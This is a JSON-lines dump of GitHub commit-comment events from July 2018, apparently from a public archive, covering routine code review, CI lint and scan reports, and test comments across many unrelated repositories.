{"id":"7989336079","type":"CommitCommentEvent","actor":{"login":"mirh"},"repo":{"name":"AlexAltea/orbital"},"payload":{"comment":{"id":29764973,"position":null,"line":null,"path":null,"commit_id":"369a0967561ded189fa843ae9654ed196255bcfb","created_at":"2018-07-19T13:56:51Z","updated_at":"2018-07-19T13:56:51Z","author_association":"NONE","body":"We just talking about AMD-V/VT-x, or also IOMMU/VT-d?"}},"created_at":"2018-07-19T13:56:51Z"}
{"id":"7989337338","type":"CommitCommentEvent","actor":{"login":"hoangviet1993"},"repo":{"name":"oppia/oppia"},"payload":{"comment":{"id":29764976,"position":null,"line":null,"path":null,"commit_id":"e3b30877bc45c239d724df91ebfe39814a2a23a9","created_at":"2018-07-19T13:57:03Z","updated_at":"2018-07-19T13:57:03Z","author_association":"CONTRIBUTOR","body":"The bootstrapck's Github zip file is also much larger than the final release zip file ( around 3880 vs 70 files ). I think all of CkEditor depdencies should be downloaded using the final release.\r\n\r\nWe can look into self-hosting these final release zip files on our Github in the future!"}},"created_at":"2018-07-19T13:57:03Z"}
{"id":"7989342784","type":"CommitCommentEvent","actor":{"login":"n3dst4"},"repo":{"name":"ReinaSHSL/Yohane-"},"payload":{"comment":{"id":29764986,"position":null,"line":null,"path":null,"commit_id":"cea355a085ba9255f87dd86908c33840cbeb7663","created_at":"2018-07-19T13:57:54Z","updated_at":"2018-07-19T13:57:54Z","author_association":"NONE","body":"Congrats on being picked up by @gitlost \r\nhttps://twitter.com/gitlost/status/1019814598822776832"}},"created_at":"2018-07-19T13:57:54Z"}
{"id":"7989345853","type":"CommitCommentEvent","actor":{"login":"kelihlodversson"},"repo":{"name":"th-otto/binutils"},"payload":{"comment":{"id":29764992,"position":92,"line":92,"path":"ld/emultempl/mint.em","commit_id":"3e4c2d0b98e39348b6da314f870d78bedf6d9437","created_at":"2018-07-19T13:58:24Z","updated_at":"2018-07-19T13:58:24Z","author_association":"NONE","body":"There is also some code that verifies that relocations don't cross between the text and data segments if this flag is set.  Also I'm pretty sure this was never supported by TOS either as it assumes some kind of multitasking as I understand it."}},"created_at":"2018-07-19T13:58:24Z"}
{"id":"7989346974","type":"CommitCommentEvent","actor":{"login":"Genrationhaze"},"repo":{"name":"Genrationhaze/ISPM1"},"payload":{"comment":{"id":29764994,"position":null,"line":null,"path":null,"commit_id":"13f1e32ccb20a76a0d882806d11527e3449b3bed","created_at":"2018-07-19T13:58:34Z","updated_at":"2018-07-19T13:58:34Z","author_association":"OWNER","body":"thank you guys for updating it. now please get involved in progressing further."}},"created_at":"2018-07-19T13:58:34Z"}
{"id":"7989347666","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/plone.app.contentlisting"},"payload":{"comment":{"id":29764997,"position":null,"line":null,"path":null,"commit_id":"76e544b96c9fcb96adc4ad4dbd93c317937b03f5","created_at":"2018-07-19T13:58:41Z","updated_at":"2018-07-19T13:58:41Z","author_association":"NONE","body":"@cekk Jenkins CI reporting about code analysis\nSee the full report here: https://jenkins.plone.org/job/package-plone.app.contentlisting/41/violations\n```\nplone/app/contentlisting/contentlisting.py:4:1: I001 isort found an import in the wrong position\nplone/app/contentlisting/contentlisting.py:5:1: I001 isort found an import in the wrong position\nplone/app/contentlisting/contentlisting.py:6:1: I001 isort found an import in the wrong position\nplone/app/contentlisting/contentlisting.py:10:1: F401 'plone.app.layout.navigation.root.getNavigationRoot' imported but unused\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2018-07-19T13:58:41Z"}
{"id":"7989351700","type":"CommitCommentEvent","actor":{"login":"mcd500"},"repo":{"name":"columbia-irt/rtptools"},"payload":{"comment":{"id":29765001,"position":null,"line":null,"path":null,"commit_id":"b362334560dc1020fddd44587f7a9be189da7d8a","created_at":"2018-07-19T13:59:18Z","updated_at":"2018-07-19T13:59:18Z","author_association":"CONTRIBUTOR","body":"I started to understand where is the mismatch. Well, the line 261 in `rtpplay.c` are not used in the code. Please think why the line 261 was added. Please.\r\nFundamentally the code of rtpdump and rtpplay are initially written by other people. Respecting the original authors and make the reviewer to merge the patch easier, I feel minimizing the changes are good,\r\nAs you mention in your comment, \"Why don't you fix RD_header() to read it into the start field of RD_hdr_t that already exists?\" is the lines in line 60 and 61 and `rd.c`. And the changes in line 60 and 61 by passing the value of start filed in the RD_hdr_t to caller will solve the \"Why don't you fix RD_header() to read it into the start field of RD_hdr_t that already exists?\" but at the same time it will break the build in `rtpplay.c`. To avoid the build break, I added innocent line 261 in `rtpplay.c`.\r\nAlternative could be changing the RD_header() to make it return to the caller of entire RD_hdr_t. I only came up returning the `start` value with two line changes when I was making the patch. Nothing more or less. "}},"created_at":"2018-07-19T13:59:18Z"}
{"id":"7989352723","type":"CommitCommentEvent","actor":{"login":"mariusc"},"repo":{"name":"iOS-Goodies/iOS-Goodies"},"payload":{"comment":{"id":29765003,"position":14,"line":22,"path":"Issues/Week239.md","commit_id":"f0e86d7404dc2a473cf31c4567fa0f1d43084067","created_at":"2018-07-19T13:59:28Z","updated_at":"2018-07-19T13:59:28Z","author_association":"MEMBER","body":"We had this article in last week's issue :)\r\nhttp://ios-goodies.com/post/175815546261/week-238"}},"created_at":"2018-07-19T13:59:28Z"}
{"id":"7989359260","type":"CommitCommentEvent","actor":{"login":"AlexAltea"},"repo":{"name":"AlexAltea/orbital"},"payload":{"comment":{"id":29765022,"position":null,"line":null,"path":null,"commit_id":"369a0967561ded189fa843ae9654ed196255bcfb","created_at":"2018-07-19T14:00:28Z","updated_at":"2018-07-19T14:00:28Z","author_association":"OWNER","body":"@mirh For now just Intel VT-x and AMD SVM."}},"created_at":"2018-07-19T14:00:28Z"}
{"id":"7989365843","type":"CommitCommentEvent","actor":{"login":"furkansahin"},"repo":{"name":"citusdata/citus"},"payload":{"comment":{"id":29765039,"position":30,"line":647,"path":"src/backend/distributed/executor/multi_utility.c","commit_id":"ae7076cb1348f4e144c89d80ef1f0ab20bbd9ebe","created_at":"2018-07-19T14:01:29Z","updated_at":"2018-07-19T14:01:29Z","author_association":"MEMBER","body":"Well, I did not write/review AlterTableStmt part, so I am not aware of what decision @velioglu did there. However, here it is not possible to use constraint->name since we do not give the constraint a name on `ALTER TABLE %s ADD COLUMN %s REFERENCES %s`."}},"created_at":"2018-07-19T14:01:29Z"}
{"id":"7989370382","type":"CommitCommentEvent","actor":{"login":"firhigher"},"repo":{"name":"firhigher/test"},"payload":{"comment":{"id":29765046,"position":3,"line":3,"path":"README.md","commit_id":"d05267bd042025e65cbca4dbe054838ef5f47d66","created_at":"2018-07-19T14:02:11Z","updated_at":"2018-07-19T14:02:11Z","author_association":"OWNER","body":"2222\r\n3333\r\n"}},"created_at":"2018-07-19T14:02:11Z"}
{"id":"7989372822","type":"CommitCommentEvent","actor":{"login":"checkmarxQA"},"repo":{"name":"checkmarxQA/CxRepository"},"payload":{"comment":{"id":29765058,"position":null,"line":null,"path":null,"commit_id":"a23cad998261c81bf63aa21ac681a2e8b5303e7c","created_at":"2018-07-19T14:02:34Z","updated_at":"2018-07-19T14:02:34Z","author_association":"OWNER","body":"Checkmarx scan results 19 Jul 2018 17:02 UTC +03:00\r\n<table>\r\n<thead>\r\n<tr>\r\n<th></th>\r\n<th>High</th>\r\n<th>Medium</th>\r\n<th>Low</th>\r\n<th>Info</th>\r\n</tr>\r\n</thead>\r\n<tbody>\r\n<tr>\r\n<td><b>New</b></td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n</tr>\r\n<tr>\r\n<td><b>Recurrent</b></td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n</tr>\r\n<tr>\r\n<td><b>Fixed</b></td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<a href= \"http://2016CITEMPLATE/CxWebClient/ViewerMain.aspx?scanid=1010011&projectid=10012\"> Open Viewer</a>\r\n<b>Included commits</b><table><tr><th>Commit ID</th><th>Owner</th></tr><tr><td><a href=\"https://github.com/checkmarxQA/CxRepository/commit/a23cad998261c81bf63aa21ac681a2e8b5303e7c\">a23cad998261c81bf63aa21ac681a2e8b5303e7c</a></td><td>@web-flow</td></tr></table>\r\n"}},"created_at":"2018-07-19T14:02:34Z"}
{"id":"7989373454","type":"CommitCommentEvent","actor":{"login":"udalov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29765062,"position":21,"line":51,"path":"build-common/src/org/jetbrains/kotlin/compilerRunner/ArgumentUtils.java","commit_id":"027de9fcf9ba4058a5d0bd0488e7c288c4ee1912","created_at":"2018-07-19T14:02:40Z","updated_at":"2018-07-19T14:02:40Z","author_association":"MEMBER","body":"I'd prefer `CollectionsKt.map(arguments.getInternalArguments(), InternalArgument::getStringRepresentation)` but it's not a big deal"}},"created_at":"2018-07-19T14:02:40Z"}
{"id":"7989380343","type":"CommitCommentEvent","actor":{"login":"820465323"},"repo":{"name":"820465323/git-zzw"},"payload":{"comment":{"id":29765075,"position":null,"line":null,"path":null,"commit_id":"3b6519a210963581a4581eb4f93f4e97f31d5cea","created_at":"2018-07-19T14:03:45Z","updated_at":"2018-07-19T14:03:45Z","author_association":"OWNER","body":"cnmcnmcncm"}},"created_at":"2018-07-19T14:03:45Z"}
{"id":"7989391327","type":"CommitCommentEvent","actor":{"login":"aldenml"},"repo":{"name":"frostwire/frostwire"},"payload":{"comment":{"id":29765094,"position":47,"line":58,"path":"desktop/src/com/frostwire/gui/components/transfers/TransferDetailTrackers.java","commit_id":"5314afc7d910675cec202b4397ce1a31fc6589e0","created_at":"2018-07-19T14:05:32Z","updated_at":"2018-07-19T14:05:32Z","author_association":"COLLABORATOR","body":"yes, no longer necessary, I made `PeerInfo` lightweight with no reference to native memory"}},"created_at":"2018-07-19T14:05:32Z"}
{"id":"7989394188","type":"CommitCommentEvent","actor":{"login":"Abd-Elrazek"},"repo":{"name":"Abd-Elrazek/Training_Git"},"payload":{"comment":{"id":29765097,"position":2,"line":2,"path":"color.txt","commit_id":"55d92801e2c0955283ba0115ec8adc5430caa987","created_at":"2018-07-19T14:06:00Z","updated_at":"2018-07-19T14:06:00Z","author_association":"OWNER","body":"this comment "}},"created_at":"2018-07-19T14:06:00Z"}
{"id":"7989394983","type":"CommitCommentEvent","actor":{"login":"szepeviktor"},"repo":{"name":"phpstan/phpstan"},"payload":{"comment":{"id":29765100,"position":null,"line":null,"path":null,"commit_id":"0e6b5855e8266b27d03141fdc63324f0d8da6c77","created_at":"2018-07-19T14:06:08Z","updated_at":"2018-07-19T14:06:08Z","author_association":"CONTRIBUTOR","body":"@ondrejmirtes Thank you!! Could you mention it in the README?"}},"created_at":"2018-07-19T14:06:08Z"}
{"id":"7989400369","type":"CommitCommentEvent","actor":{"login":"dsavvinov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29765117,"position":21,"line":51,"path":"build-common/src/org/jetbrains/kotlin/compilerRunner/ArgumentUtils.java","commit_id":"027de9fcf9ba4058a5d0bd0488e7c288c4ee1912","created_at":"2018-07-19T14:06:58Z","updated_at":"2018-07-19T14:06:58Z","author_association":"CONTRIBUTOR","body":"Me too, but somehow such call is unresolved for me. I decided that it's not too critical matter to investigate why, but maybe I should have?"}},"created_at":"2018-07-19T14:06:58Z"}
{"id":"7989400858","type":"CommitCommentEvent","actor":{"login":"Shelipov"},"repo":{"name":"Shelipov/Parsin-Aline"},"payload":{"comment":{"id":29765119,"position":null,"line":null,"path":null,"commit_id":"b2a87322fadcbedb06db285d92eb74f22281941c","created_at":"2018-07-19T14:07:02Z","updated_at":"2018-07-19T14:07:02Z","author_association":"OWNER","body":"nado tak"}},"created_at":"2018-07-19T14:07:02Z"}
{"id":"7989405991","type":"CommitCommentEvent","actor":{"login":"Abd-Elrazek"},"repo":{"name":"Abd-Elrazek/Training_Git"},"payload":{"comment":{"id":29765134,"position":null,"line":null,"path":null,"commit_id":"55d92801e2c0955283ba0115ec8adc5430caa987","created_at":"2018-07-19T14:07:52Z","updated_at":"2018-07-19T14:07:52Z","author_association":"OWNER","body":"this for comment in this comment"}},"created_at":"2018-07-19T14:07:52Z"}
{"id":"7989410866","type":"CommitCommentEvent","actor":{"login":"alexanderzhigulich"},"repo":{"name":"MailCore/mailcore2"},"payload":{"comment":{"id":29765143,"position":null,"line":null,"path":null,"commit_id":"91300dbf44bcdfe822a9778d1c9d3cec2c2790d7","created_at":"2018-07-19T14:08:39Z","updated_at":"2018-07-19T14:08:39Z","author_association":"NONE","body":"Hello, \r\nSeems you forget semicolon after break."}},"created_at":"2018-07-19T14:08:39Z"}
{"id":"7989412153","type":"CommitCommentEvent","actor":{"login":"udalov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29765147,"position":21,"line":51,"path":"build-common/src/org/jetbrains/kotlin/compilerRunner/ArgumentUtils.java","commit_id":"027de9fcf9ba4058a5d0bd0488e7c288c4ee1912","created_at":"2018-07-19T14:08:50Z","updated_at":"2018-07-19T14:08:50Z","author_association":"MEMBER","body":"Are you sure you've imported the correct `CollectionsKt`? Works for me"}},"created_at":"2018-07-19T14:08:50Z"}
{"id":"7989415017","type":"CommitCommentEvent","actor":{"login":"I3uckwheat"},"repo":{"name":"TheOdinProject/curriculum"},"payload":{"comment":{"id":29765152,"position":null,"line":null,"path":null,"commit_id":"86aee66ee78e9c1559006b978449b4039b7e3031","created_at":"2018-07-19T14:09:18Z","updated_at":"2018-07-19T14:09:18Z","author_association":"MEMBER","body":"Thanks! Reads better and looks better!"}},"created_at":"2018-07-19T14:09:18Z"}
{"id":"7989417356","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"dwk5/ror_edu"},"payload":{"comment":{"id":29765160,"position":18,"line":18,"path":"discriminant.rb","commit_id":"3cce79407935bb95a77141b924cc553911dcadfb","created_at":"2018-07-19T14:09:40Z","updated_at":"2018-07-19T14:09:40Z","author_association":"NONE","body":"в 17 и 16 строке вычиляется квадрытный корень. Что-б избежать вычисления 2 раза можно записать значение в переменную. В случае с более сложной операцией, это сэкономит ресурсы"}},"created_at":"2018-07-19T14:09:40Z"}
{"id":"7989417622","type":"CommitCommentEvent","actor":{"login":"jaymode"},"repo":{"name":"tvernum/elasticsearch"},"payload":{"comment":{"id":29765161,"position":17,"line":271,"path":"x-pack/plugin/core/src/main/java/org/elasticsearch/license/XPackLicenseState.java","commit_id":"5b0424c8ff5592c9832146ab866ae455d592a6d6","created_at":"2018-07-19T14:09:42Z","updated_at":"2018-07-19T14:09:42Z","author_association":"NONE","body":"I agree"}},"created_at":"2018-07-19T14:09:42Z"}
{"id":"7989422662","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"protonspring/Stockfish"},"payload":{"comment":{"id":29765175,"position":null,"line":null,"path":null,"commit_id":"5c13a4997f011c07a961bc18e01f4ccfb9c9e3ea","created_at":"2018-07-19T14:10:30Z","updated_at":"2018-07-19T14:10:30Z","author_association":"NONE","body":"@protonspring \r\n\r\nFor history updates the bonus value has to be not greater than the table divisor (in debug mode this is checked per assert). The smallest divisor is currently 10368 (main and capture history). So bonus have to not exceed this (the current formula gives for depth=17 a maximum bonus value of 10272). Your formula  gives for depth=17 a bonus of 13294 which exceeds this limit.\r\n"}},"created_at":"2018-07-19T14:10:30Z"}
{"id":"7989424743","type":"CommitCommentEvent","actor":{"login":"jpeller"},"repo":{"name":"lrargerich/Apunte"},"payload":{"comment":{"id":29765181,"position":null,"line":null,"path":null,"commit_id":"b056894b3ecea90620daf881e27c9d27384a69fe","created_at":"2018-07-19T14:10:49Z","updated_at":"2018-07-19T14:10:49Z","author_association":"NONE","body":"El índice del PDF está roto en esta versión (en la previa funciona bien). Saludos!"}},"created_at":"2018-07-19T14:10:49Z"}
{"id":"7989424945","type":"CommitCommentEvent","actor":{"login":"BlackScreen"},"repo":{"name":"jb-alvarado/media-autobuild_suite"},"payload":{"comment":{"id":29765183,"position":null,"line":null,"path":null,"commit_id":"f0c4ab95b02d21bb2b7abf610c5da33c8a77dc54","created_at":"2018-07-19T14:10:51Z","updated_at":"2018-07-19T14:10:51Z","author_association":"NONE","body":"I understand what you are saying with the options.\r\nSomehow it still does not work: [logs.zip] (https://0x0.st/sOUh.zip)"}},"created_at":"2018-07-19T14:10:51Z"}
{"id":"7989425701","type":"CommitCommentEvent","actor":{"login":"dsavvinov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29765185,"position":21,"line":51,"path":"build-common/src/org/jetbrains/kotlin/compilerRunner/ArgumentUtils.java","commit_id":"027de9fcf9ba4058a5d0bd0488e7c288c4ee1912","created_at":"2018-07-19T14:10:58Z","updated_at":"2018-07-19T14:10:58Z","author_association":"CONTRIBUTOR","body":"Derp, yes, you're right, that was some other `CollectionsKt` :("}},"created_at":"2018-07-19T14:10:58Z"}
{"id":"7989433362","type":"CommitCommentEvent","actor":{"login":"aldenml"},"repo":{"name":"frostwire/frostwire"},"payload":{"comment":{"id":29765199,"position":134,"line":135,"path":"desktop/src/com/frostwire/gui/components/transfers/TransferDetailTrackers.java","commit_id":"5314afc7d910675cec202b4397ce1a31fc6589e0","created_at":"2018-07-19T14:12:13Z","updated_at":"2018-07-19T14:12:13Z","author_association":"COLLABORATOR","body":"technically, they are, but for UI purpose, I think we should not (like qBittorrent)"}},"created_at":"2018-07-19T14:12:13Z"}
{"id":"7989437568","type":"CommitCommentEvent","actor":{"login":"abompard"},"repo":{"name":"abompard/fedora-messaging"},"payload":{"comment":{"id":29765207,"position":null,"line":null,"path":null,"commit_id":"4a59ad19969440dc0b41a6b5d68949107d86f39b","created_at":"2018-07-19T14:12:51Z","updated_at":"2018-07-19T14:12:51Z","author_association":"OWNER","body":"What do you think of that @jcline?\r\nI don't think the \"extractor\" term is great so if you have something better, I'm very open to suggestions..."}},"created_at":"2018-07-19T14:12:51Z"}
{"id":"7989438779","type":"CommitCommentEvent","actor":{"login":"szyszka90"},"repo":{"name":"GoldenLine/sso"},"payload":{"comment":{"id":29765213,"position":null,"line":null,"path":null,"commit_id":"7a4d91c66f8b2ae232e4108d2a79f71b24a629f2","created_at":"2018-07-19T14:13:02Z","updated_at":"2018-07-19T14:13:02Z","author_association":"COLLABORATOR","body":"@domen1806 jeszcze tutaj zabezpieczylem zeby przy kazdym attachu nie lecial bezsensownie request"}},"created_at":"2018-07-19T14:13:02Z"}
{"id":"7989441422","type":"CommitCommentEvent","actor":{"login":"kirrg001"},"repo":{"name":"TryGhost/Ghost"},"payload":{"comment":{"id":29765217,"position":null,"line":null,"path":null,"commit_id":"58e3439d95bc3c0930ef693bb7e5e5d3100d1a82","created_at":"2018-07-19T14:13:26Z","updated_at":"2018-07-19T14:13:26Z","author_association":"CONTRIBUTOR","body":"> Renamed `amp` post column to `column_id`\r\n\r\nThis should be\r\n\r\n> Renamed `amp` post column to `comment_id`\r\n\r\nYou can't believe it. I was typing `column_id` instead of `comment_id` a couple of times while coding. \r\nAnd now it's part of the commit message - nice 😆\r\n"}},"created_at":"2018-07-19T14:13:26Z"}
{"id":"7989442729","type":"CommitCommentEvent","actor":{"login":"jose"},"repo":{"name":"kanonizo/kanonizo"},"payload":{"comment":{"id":29765222,"position":4,"line":13,"path":".travis.yml","commit_id":"f289e46309804d881c6f225aa8f165d8730702e1","created_at":"2018-07-19T14:13:39Z","updated_at":"2018-07-19T14:13:39Z","author_association":"CONTRIBUTOR","body":"you can't remove this instruction. :)"}},"created_at":"2018-07-19T14:13:39Z"}
{"id":"7989442909","type":"CommitCommentEvent","actor":{"login":"protonspring"},"repo":{"name":"protonspring/Stockfish"},"payload":{"comment":{"id":29765224,"position":null,"line":null,"path":null,"commit_id":"5c13a4997f011c07a961bc18e01f4ccfb9c9e3ea","created_at":"2018-07-19T14:13:40Z","updated_at":"2018-07-19T14:13:40Z","author_association":"OWNER","body":"That was actually a helpful response.  Thank you.\n\nOn Thu, Jul 19, 2018 at 8:10 AM, Stefan Geschwentner <\nnotifications@github.com> wrote:\n\n> @protonspring <https://github.com/protonspring>\n>\n> For history updates the bonus value has to be not greater than the table\n> divisor (in debug mode this is checked per assert). The smallest divisor is\n> currently 10368 (main and capture history). So bonus have to not exceed\n> this (the current formula gives for depth=17 a maximum bonus value of\n> 10272). Your formula gives for depth=17 a bonus of 13294 which exceeds this\n> limit.\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/protonspring/Stockfish/commit/5c13a4997f011c07a961bc18e01f4ccfb9c9e3ea#commitcomment-29765175>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AcVnSPcotH5QMVgVGLrZhuEQkrjEtW41ks5uIJNWgaJpZM4VWeDe>\n> .\n>\n\n\n\n-- \nMichael T. Whiteley\nmobile: 801.707.6886\n"}},"created_at":"2018-07-19T14:13:40Z"}
{"id":"7989443431","type":"CommitCommentEvent","actor":{"login":"ekbda"},"repo":{"name":"EpicoTech/apexdojo"},"payload":{"comment":{"id":29765228,"position":null,"line":null,"path":null,"commit_id":"adc004bc67fb7b55af3aea6a9ee7b665e796daad","created_at":"2018-07-19T14:13:45Z","updated_at":"2018-07-19T14:13:45Z","author_association":"COLLABORATOR","body":"Only works for rendering currently"}},"created_at":"2018-07-19T14:13:45Z"}
{"id":"7989444420","type":"CommitCommentEvent","actor":{"login":"matthewbauer"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29765229,"position":14,"line":17,"path":"pkgs/development/libraries/libuv/default.nix","commit_id":"620238009444730c3ad5aa419248fa698626f49a","created_at":"2018-07-19T14:13:55Z","updated_at":"2018-07-19T14:13:55Z","author_association":"MEMBER","body":"Thanks - I had the wrong url there. Fixed in 0467e8d1f60096e11bda77065c5f99fedd5a27f6."}},"created_at":"2018-07-19T14:13:55Z"}
{"id":"7989445950","type":"CommitCommentEvent","actor":{"login":"ForYaSee"},"repo":{"name":"git/git"},"payload":{"comment":{"id":29765231,"position":null,"line":null,"path":null,"commit_id":"e83c5163316f89bfbde7d9ab23ca2e25604af290","created_at":"2018-07-19T14:14:09Z","updated_at":"2018-07-19T14:14:09Z","author_association":"NONE","body":"Hello World!"}},"created_at":"2018-07-19T14:14:09Z"}
{"id":"7989446105","type":"CommitCommentEvent","actor":{"login":"sheetaluk"},"repo":{"name":"hypothesis/h"},"payload":{"comment":{"id":29765233,"position":null,"line":null,"path":null,"commit_id":"9ab09a918f70a595811d26d8ad787cb0f53ce0a1","created_at":"2018-07-19T14:14:11Z","updated_at":"2018-07-19T14:14:11Z","author_association":"CONTRIBUTOR","body":"The following requests seem to work as expected:\r\n```\r\nCreate a user:\r\n>>> resp = requests.post(\"http://localhost:5000/api/users\", auth=(\"a08cd258-7fac-11e8-b199-fbe6e50d9136\", \"qD_SVO1ZT1u7fbJkfeH4FRZ0RMq_8mT9pyjf_ogadJc\"), data=json.dumps(dict(email=\"user1@sheetal\", username=\"user2\", authority=\"sheetal\", password=\"some_password\")));\r\n>>> resp\r\n<Response [200]>\r\n\r\nTry to recreate the same user:\r\n>>> resp = requests.post(\"http://localhost:5000/api/users\", auth=(\"a08cd258-7fac-11e8-b199-fbe6e50d9136\", \"qD_SVO1ZT1u7fbJkfeH4FRZ0RMq_8mT9pyjf_ogadJc\"), data=json.dumps(dict(email=\"user1@sheetal\", username=\"user2\", authority=\"sheetal\", password=\"some_password\")));\r\n>>> resp\r\n<Response [409]>\r\n\r\nUse bad authority and same user:\r\n>>> resp = requests.post(\"http://localhost:5000/api/users\", auth=(\"a08cd258-7fac-11e8-b199-fbe6e50d9136\", \"qD_SVO1ZT1u7fbJkfeH4FRZ0RMq_8mT9pyjf_ogadJc\"), data=json.dumps(dict(email=\"user1@sheetal\", username=\"user2\", authority=\"sheetaly\", password=\"some_password\")));\r\n>>> resp\r\n<Response [400]>\r\n\r\nUse bad authority\r\n>>> resp = requests.post(\"http://localhost:5000/api/users\", auth=(\"a08cd258-7fac-11e8-b199-fbe6e50d9136\", \"qD_SVO1ZT1u7fbJkfeH4FRZ0RMq_8mT9pyjf_ogadJc\"), data=json.dumps(dict(email=\"user3@sheetal\", username=\"user3\", authority=\"sheetaly\", password=\"some_password\")));\r\n>>> resp\r\n<Response [400]>\r\n\r\nBad client secret:\r\n>>> resp = requests.post(\"http://localhost:5000/api/users\", auth=(\"a08cd258-7fac-11e8-b199-fbe6e50d9136\", \"qD_SVO1ZT1u7fbJkfH4FRZ0RMq_8mT9pyjf_ogadJ\"), data=json.dumps(dict(email=\"user4@sheetal\", username=\"user4\", authority=\"sheetal\", password=\"some_password\")));\r\n>>> resp\r\n<Response [403]>\r\n\r\nBad client id:\r\n>>> resp = requests.post(\"http://localhost:5000/api/users\", auth=(\"a08cd258-7fac-11e8-b199-fbe6e56\", \"qD_SVO1ZT1u7fbJkfeH4FRZ0RMq_8mT9pyjf_ogadJc\"), data=json.dumps(dict(email=\"user5@sheetal\", username=\"user5\", authority=\"sheetaly\", password=\"some_password\")));\r\n>>> resp\r\n<Response [403]>\r\n```"}},"created_at":"2018-07-19T14:14:11Z"}
{"id":"7989447647","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"dwk5/ror_edu"},"payload":{"comment":{"id":29765241,"position":20,"line":20,"path":"re_triangle.rb","commit_id":"3cce79407935bb95a77141b924cc553911dcadfb","created_at":"2018-07-19T14:14:25Z","updated_at":"2018-07-19T14:14:25Z","author_association":"NONE","body":"Только проверку на равносторонность нужно осуществлять только в случае прямоугольного треугольника. Из тз, это не слишком очевидно \"Также, если треугольник является при этом равнобедренным\". Можно записать вычисление Пифагора в переменную, которая будет возвращать true/false и переиспользовать ее, скомбинировав условия здесь"}},"created_at":"2018-07-19T14:14:25Z"}
{"id":"7989447928","type":"CommitCommentEvent","actor":{"login":"djpaterson"},"repo":{"name":"kanonizo/kanonizo"},"payload":{"comment":{"id":29765242,"position":4,"line":13,"path":".travis.yml","commit_id":"f289e46309804d881c6f225aa8f165d8730702e1","created_at":"2018-07-19T14:14:28Z","updated_at":"2018-07-19T14:14:28Z","author_association":"COLLABORATOR","body":"yep. oops "}},"created_at":"2018-07-19T14:14:28Z"}
{"id":"7989449613","type":"CommitCommentEvent","actor":{"login":"McAfeeAdminInstance2"},"repo":{"name":"McAfeeInst2Org1/newrepo"},"payload":{"comment":{"id":29765249,"position":1,"line":null,"path":"1532009682.32/github_test.txt","commit_id":"2ea69810605ba1431fa9ae857a310f8c2ba5d2a1","created_at":"2018-07-19T14:14:44Z","updated_at":"2018-07-19T14:14:44Z","author_association":"CONTRIBUTOR","body":"889976543"}},"created_at":"2018-07-19T14:14:44Z"}
{"id":"7989451698","type":"CommitCommentEvent","actor":{"login":"Shoaib0597"},"repo":{"name":"LuizPauloDamaceno/SimpleK_Santoni_V2"},"payload":{"comment":{"id":29765258,"position":null,"line":null,"path":null,"commit_id":"fbba2481d0ddea9735afd69edb10ca6ca8ee9303","created_at":"2018-07-19T14:15:04Z","updated_at":"2018-07-19T14:15:04Z","author_association":"NONE","body":"Hey, can you explain to me how you came up with the cost data? I am new to EAS. At this point, you have 7 Frequencies for big Cluster and 5 Frequencies for LITTLE but you only have 6 Entries in Cost Data. So, how does this works?\r\n\r\nqcom,cpufreq-table-0 =\r\n\t\t\t <  960000 >,\r\n\t\t\t < 1094400 >,\r\n\t\t\t < 1209600 >,\r\n\t\t\t < 1248000 >,\r\n\t\t\t < 1344000 >,\r\n\t\t\t < 1401000 >,\r\n\t\t\t < 1497600 >;\r\n\r\n\t\tqcom,cpufreq-table-4 =\r\n\t\t\t <  768000 >,\r\n\t\t\t <  902400 >,\r\n\t\t\t <  998400 >,\r\n\t\t\t < 1094400 >,\r\n                         < 1209600 >;"}},"created_at":"2018-07-19T14:15:04Z"}
{"id":"7989455337","type":"CommitCommentEvent","actor":{"login":"wudimanong"},"repo":{"name":"wudimanong/devtools"},"payload":{"comment":{"id":29765269,"position":null,"line":null,"path":null,"commit_id":"645713f7afc4e42009999d0533b6045b21a1c2c6","created_at":"2018-07-19T14:15:37Z","updated_at":"2018-07-19T14:15:37Z","author_association":"OWNER","body":"g"}},"created_at":"2018-07-19T14:15:37Z"}
{"id":"7989456020","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"dwk5/ror_edu"},"payload":{"comment":{"id":29765271,"position":7,"line":7,"path":"triangle_square.rb","commit_id":"3cce79407935bb95a77141b924cc553911dcadfb","created_at":"2018-07-19T14:15:43Z","updated_at":"2018-07-19T14:15:43Z","author_association":"NONE","body":"Сразу привыкаем давать переменным и методам говорящие имена. Это упрощает понимание намерения кода. Тут можно назвать переменные не \"а, h\", а \"base\" height и area например"}},"created_at":"2018-07-19T14:15:43Z"}
{"id":"7989462612","type":"CommitCommentEvent","actor":{"login":"uBlock-user"},"repo":{"name":"uBlockOrigin/uAssets"},"payload":{"comment":{"id":29765285,"position":null,"line":null,"path":null,"commit_id":"23206100198dfdd3c789773e953a232e442bdc48","created_at":"2018-07-19T14:16:41Z","updated_at":"2018-07-19T14:16:41Z","author_association":"MEMBER","body":"> Just found out this does not work, this is actually a bug -- just this one should work theoretically. Need to fix this.\r\n\r\nSeen that happen many times before, but thought this was by-design, so didn't report."}},"created_at":"2018-07-19T14:16:41Z"}
